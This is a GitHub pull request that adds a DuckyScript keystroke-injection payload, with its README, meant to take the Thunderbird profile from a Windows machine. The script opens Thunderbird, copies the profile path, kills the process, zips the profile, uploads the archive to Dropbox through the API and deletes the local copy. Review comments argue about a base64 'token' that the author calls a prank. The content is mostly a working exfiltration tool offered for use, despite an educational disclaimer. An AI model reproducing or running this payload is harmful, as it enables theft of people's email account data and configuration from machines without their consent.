Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Save Your Thunderbird Settings via Dropbox #454

Open
wants to merge 4 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from 2 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
103 changes: 103 additions & 0 deletions payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,103 @@
# Save Your Thunderbird Settings via Dropbox

Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature.

This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration.

**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff!
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please remove any personal tokens.

Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...

Copy link
Contributor Author

@aleff-github aleff-github Jun 27, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it's just a prank :-/


**Category:** Exfiltration

## Index

- [Overview](#overview)
- [Requirements](#requirements)
- [Test Environment](#test-environment)
- [Configuration](#configuration)
- [Functionality](#functionality)
- [System Detection](#system-detection)
- [Opening Thunderbird](#opening-thunderbird)
- [Copying Profile Folder Path](#copying-profile-folder-path)
- [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox)
- [Notes](#notes)
- [Credits](#credits)

## Overview

This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox.

## Requirements

- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file.
- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem.
- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet...

## Test Environment

- Thunderbird 115.11.1 (64 bit)
- Windows 10 Pro

## Configuration

Before running the program, ensure to set the following parameters (*except #DROPBOX_API_CONST that is a constant*) correctly/as you prefer:

```plaintext
DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please update this to use a placeholder to prevent confusion. Similar to how it's defined inside your payload.

DEFINE #ACCESS_TOKEN example-access-token

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it's just a prank :-/

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Convert from aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== via base64 and the result is https://www.youtube.com/watch?v=RvY5ploo1OI.

This video reindexes toward an Italian meme that says "Eh volevi..." so "eh you wanted..." referring to the fact that a person was trying to use a valid token while actually being pranked.

It's so bad to have to explain a joke :(

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I understand, but other might not and that's my concern. Other people might read your readme and see the base64 and assume its your token and use. They might not understand that its a joke. Its unlikely that someone will do this but we can prevent the possibility.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think we should be a little more flexible 🤷‍♂️

DEFINE #ARCHIVE_NAME cache.zip
DEFINE #DROPBOX_FOLDER_PATH /
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
```
- `#ACCESS_TOKEN`: Your private Dropbox access token
- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`).
- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`).

## Functionality

### System Detection

The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied.

### Opening Thunderbird

The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use.

### Copying Profile Folder Path

The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file.

### Opening PowerShell and Uploading to Dropbox

Using PowerShell, the script performs the following actions:

1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path.
2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used.
3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file.
4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API.
5. **Cleanup:** Removes the local ZIP file after the upload is complete.

## Notes

- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal.
- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data.

## Credits

<h2 align="center"><a href="https://aleff-gitlab.gitlab.io/">Aleff</a></h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
Original file line number Diff line number Diff line change
@@ -0,0 +1,105 @@
REM ##############################################################
REM # #
REM # Title : Save Your Thunderbird Settings via Dropbox #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Exfiltration #
REM # Target : Windows 10/11 #
REM # #
REM ##############################################################

REM Required: Set here your Dropbox access TOKEN
DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==
aleff-github marked this conversation as resolved.
Show resolved Hide resolved
DEFINE #ARCHIVE_NAME cache.zip
DEFINE #DROPBOX_FOLDER_PATH /
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload

EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION

GUI r
STRING thunderbird
ENTER
DELAY 1000
REPEAT 4 TAB
DELAY 500
ENTER
DELAY 500
REPEAT 2 UPARROW
DELAY 500
ENTER
DELAY 500
REPEAT 3 UPARROW
DELAY 500
ENTER
DELAY 500

REM Inside the settings
REPEAT 11 TAB
DELAY 500
ENTER
DELAY 500

REM INSIDE THE PROFILE FOLDER
REPEAT 4 TAB
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 500
ALT F4
DELAY 500
GUI r
STRING powershell
ENTER
DELAY 1500

STRINGLN cd $env:TEMP
DELAY 500
STRINGLN Stop-Process -Name "thunderbird" -Force
DELAY 500
STRING Compress-Archive -LiteralPath
DELAY 500
CTRL v
DELAY 500
STRINGLN -DestinationPath ./#ARCHIVE_NAME
DELAY 1000

STRINGLN
aleff-github marked this conversation as resolved.
Show resolved Hide resolved
$filePath = "$env:TEMP/#ARCHIVE_NAME"
$filePath = $filePath -replace "\\", "/"
$dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME"
$accessToken = "#ACCESS_TOKEN"
$fileContent = [System.IO.File]::ReadAllBytes($filePath)
$headers = @{
"Authorization" = "Bearer $accessToken"
"Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}")
"Content-Type" = "application/octet-stream"
}
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit
END_STRINGLN